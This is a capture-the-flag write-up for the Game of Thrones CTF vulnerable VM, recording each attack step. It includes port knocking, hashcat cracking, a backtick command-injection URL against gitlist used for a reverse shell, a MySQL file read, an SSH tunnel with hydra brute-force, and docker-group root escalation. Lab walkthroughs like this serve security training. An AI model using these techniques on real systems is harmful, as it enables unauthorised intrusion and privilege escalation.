Last updated: 15 Apr 24 09:27:10 (UTC)

complete GameOfThrones

GameOfThrones

By Lawcky 08/02/2024

Introduction

GameOfThrones

Difficulty : Hard

Additionnal info :

Name: Game of Thrones CTF: 1
Release date: 8 Sep 2017
Author: OscarAkaElvis
Series: Game of Thrones CTF

|NOTE| for this write-up every screen shot and ressources will be listed in this single page.

In this write-up

nmap
ffuf
ftp
burp-suite
knockd (port knocking)
hashcat
mcrypt
strings, binwalk & exiftool
dig linux command
webmin & cheerpJ
postgresql
Rot cypher
imap
git list
rce git list
mysql
read a system file through mysql
port forwarding using ssh
hydra
docker group privesc

Write-UP

Nmap

Enumerating:

/the-tree/ : picture with text
source code :"You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody

/secret-island/ : image and map link
source code :"Take this map and use it wisely. I want to be your friend" - Petyr (Littlefinger) Baelish

/direct-access-to-kings-landing/ : image
source code :"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark

192.168.1.12:10000

Found the MAP

the write-up will folow the map order

The Dorne (FTP)

fail2ban is installed so no bruteforcing, and we need a username/password other than anonymous

after changing my User-Agent to Three-eyed-raven (using the tips of the robots.txt above) and accessing the /the-tree/ I access another image with a different source code :

seeing this order 3487 64535 12345 i thought it looked familiar with another machine i did and tried Port Knocking,

knock 192.168.1.12 3487 64535 12345

before port knocking
143/tcp filtered imap

after port knocking
143/tcp open imap Dovecot imapd
turns out it was not necessary for first flag but anyway its done

still needing more information i went back to the port 80 and tried to gather more information

fuzzing

i found http://192.168.1.12/h/
then /i/d/d/e/n/

source code : "My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys "Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light has shown me" - The Red Woman Melisandre

we now have :

user :

oberynmartell

in base64 :

b2JlcnlubWFydGVsbA==

password :

A_verySmallManCanCastAVeryLargeShad0w

in base64:

QV92ZXJ5U21hbGxNYW5DYW5DYXN0QVZlcnlMYXJnZVNoYWQwdw==

command :
ftp oberynmartell@192.168.1.12
+ password

`fb8d98be1265dd88bac522e1b2182140`

Fist flag found

The Wall & The North (http)

Mcrypt file

we get two things from that :

md5(md5($s).$p)

nobody:6000e084bf18c302eae4559d48cb520c$2hY68a

we also get a file

it is encrypted using the mcrypt tools and it needs a passphrase in order to be decrypted.

we know that the format is md5(md5($s).$p)

and we have the user nobody and 6000e084bf18c302eae4559d48cb520c$2hY68a

using hashcat mode 20 ends in a failure,
since we know the format lets try breaking the hash with the md5sum of the salt given $2hY68a

echo -n '2hY68a' | md5sum
0cbb5be2c4504bed573802efbd909965

echo -n 6000e084bf18c302eae4559d48cb520c:0cbb5be2c4504bed573802efbd909965 > hash

hashcat -m 20 hash ~/tools/seclists/rockyou.txt

nobody:stark

back to our mcrypt file

Http

jonsnow:Ha1lt0th3k1ng1nth3n0rth!!!

http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------

after adding it to /etc/hosts :

source code : Welcome to Winterfell You conquered the Kingdom of the North. This is your second kingdom flag! 639bae9ac6b3e1a84cebb7b403297b79 We must do something here before travelling to Iron Islands, my lady" - Podrick Payne "Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth

`639bae9ac6b3e1a84cebb7b403297b79`

Second flag found

Iron Islands (DNS)

"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth

seems to be referring to one of the images on the website, lets see if there is anything hidden inside.

using strings commands we found a couple of things with for exemple :

"Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy

using dnsenum

tried :

dig Timef0rconqu3rs.7kingdoms.ctf @192.168.1.12
&
dig VGltZWYwcmNvbnF1M3JzCg==.7kingdoms.ctf @192.168.1.12
&
nslookup 'VGltZWYwcmNvbnF1M3JzCg==.7kingdoms.ctf' 192.168.1.12
&
sudo iodine -f -P Timef0rconqu3rs 192.168.1.12 7kingdoms.ctf
&
dig Timef0rconqu3rs @192.168.1.12

the right command was :

dig txt Timef0rconqu3rs.7kingdoms.ctf -p 53 @192.168.1.12

Timef0rconqu3rs.7kingdoms.ctf. 86400 IN TXT "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"

`5e93de3efa544e85dcd6311732d28f95`

Third flag found

Savages Flag (secret)

based on the sentence:
I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark

i thought the secret flag could have been inside the music on the home page,

downloaded both the .wav and the .mp3,

nothing was hidden inside the .wav but inside the .mp3 using the strings command i found the flag

later in the write-up i found out that this flag wasnt complete, by using a more adapted tools such as exiftool i was able to get the full flag :

`8bf8854bebe108183caeb845c7676ae4`

First secret flag found

Stormlands (webmin)

aryastark/N3ddl3_1s_a_g00d_sword#!

http://stormlands.7kingdoms.ctf:10000

we are looking for ~/flag.txt

http://stormlands.7kingdoms.ctf:10000/file/
is bugged

since java is not supported by web browsers since end of 2017 this part is not possible to achieve anymore.

after 3 different web browsers, 4 unsuccessful installation of chromium on 2 different machine with the cheerpJ plugin, all that on 2 different OS i finally manage to make chromium work with cheerpJ to access the file !

installation time : about 1h30min
get the flag : litterally 10 seconds

The credentials to access to the Mountain and the Vale kingdom are: user/pass: robinarryn/cr0wn_f0r_a_King-_ db: mountainandthevale pgAdmin magic will not work. Command line should be used on that kingdom - Talisa Maegyr

`8fc42c6ddf9966db3b09e84365034357`

Fourth flag found

Mountain and the Vale (postgresql)

robinarryn:cr0wn_f0r_a_King-_

psql -h 192.168.1.12 -p 5432 -U robinarryn -W -d mountainandthevale

lets search the databases :
kill_list

Bravoos book

Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
looks like Rot Cypher

lets first go back to the Rot

City Of Bravoos (secret)

once decypher it is :

The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis

the missing page is the fifth
so : TheRedWomanMelisandre

`3f82c41a70a8b0cfec9052252d9fd721`

Second secret flag found

There is a mention of knocking and ‘POLITE’ people, which means that the port knocking was supposed to be done here, anyway its already done

There is also a mention about the face that we ‘OWN’ our destiny might be something to do with rights and a mention about a secret tunnel in a docker reference to a docker escape probably

found the flag in the relation table, cant read it yet but i am indeed the owner of it, i just have to change the permissions.

GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO robinarryn;

then we open the table

we get a base64 encoded message

echo 'TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw==' | base64 -d

Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf:H1gh.Gard3n.powah , but first you must be able to open the gates

`bb3aec0fdcdbc2974890f805c585d432`

Fifth flag found

The Reach (imap)

olennatyrell@7kingdoms.ctf:H1gh.Gard3n.powah
since we already did the port knocking we dont have to do it again

imap commands are annoying lets just use a imap client

`aee750c2009723355e2ac57564f9c3db`

sixth flag found

The Rock (gitlist)

Now you can auth on next Kingdom (The Rock, port 1337)

TywinLannister:LannisterN3verDie!

we can connect to it at :
http://192.168.1.12:1337/

Enumerating

2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874 looks like hex

more text…

even more text…

Exploiting

lets try a remote code execution, since we have no way of knowing what is the actual version of the gitlist service i used an exploit that was discovered before the release of the machine.

by default the exploit doesnt ask for credentials, to bypass this we use the url format http://user:pass@domain.com/ to still login

once we decode the hex above 2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874

/home/tyrionlannister/checkpoint.txt

lets try to read this file with the exploit

i have setup a listening netcat to intercept the file incase it does work

the exploit is running but it does not seem to be executing any commands.

after searching through more known rce exploit i was able to find one in one of the urls :

http://192.168.1.12:1337/casterly-rock/tree/master/%22%22%60whoami%60/

i got a reverse shell

The King’s Landing

cerseilannister:_g0dsHaveNoMercy_
db: kingslanding

mysql -h 192.168.1.12 -u cerseilannister -p -D kingslanding

-..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --. it is morse code

/ETC/MYSQL/FLAG

after looking at the privileges :

using the CREATE TABLE ..; command and the LOAD DATA INFILE '..' INTO TABLE ..; i can read the file.

`c8d46d341bea4fd5bff866a65ff8aea9`

Seventh flag found

Dragonglass mine (secret)

daenerystargaryen:.Dracarys4thewin.

we now have access to a hidden machine 172.25.0.2

we also have a wordlist and an explanation that fail2ban is not setup for this.

lets create a port forwarding from our machine to that hidden machine that’ll pass through the ssh connection, than we use that same port forwarding to bruteforce using the given wordlists for user root.

ssh -L 10000:172.25.0.2:22 daenerystargaryen@192.168.1.12

it worked !

now hydra :

hydra -l root -P digger.txt ssh://127.0.0.1:10000

root:Dr4g0nGl4ss!

`a8db1d82db78ed452ba0882fb9554fc9`

Third secret flag found

White Walkers Final Battle (ssh)

branstark:Th3_Thr33_Ey3d_Raven

“The time has come” - The Three Eyed Raven

using the docker group we can easily privesc to root user

using hacktricks with the docker image ironislands

docker run -it -v /:/host/ ironislands chroot /host/ bash

secret_flag1=8bf8854bebe108183caeb845c7676ae4
secret_flag2=3f82c41a70a8b0cfec9052252d9fd721
secret_flag3=a8db1d82db78ed452ba0882fb9554fc9

the result is apparently
8bf8854be9fd721b9554fc9

and the file type of final_battle is a zip file.

final_battle: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted

by analysing this :

useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))

we understand that the final password is basically the last 10 digits of the three flags concat together.

45c7676ae4252d9fd7212fb9554fc9

`8e63dcd86ef9574181a9b6184ed3dde5`

Final flag found

the GameOfThrones machine is finally finished.

Final Message

the 11 flags are a sentences, lets use hashcat to get it.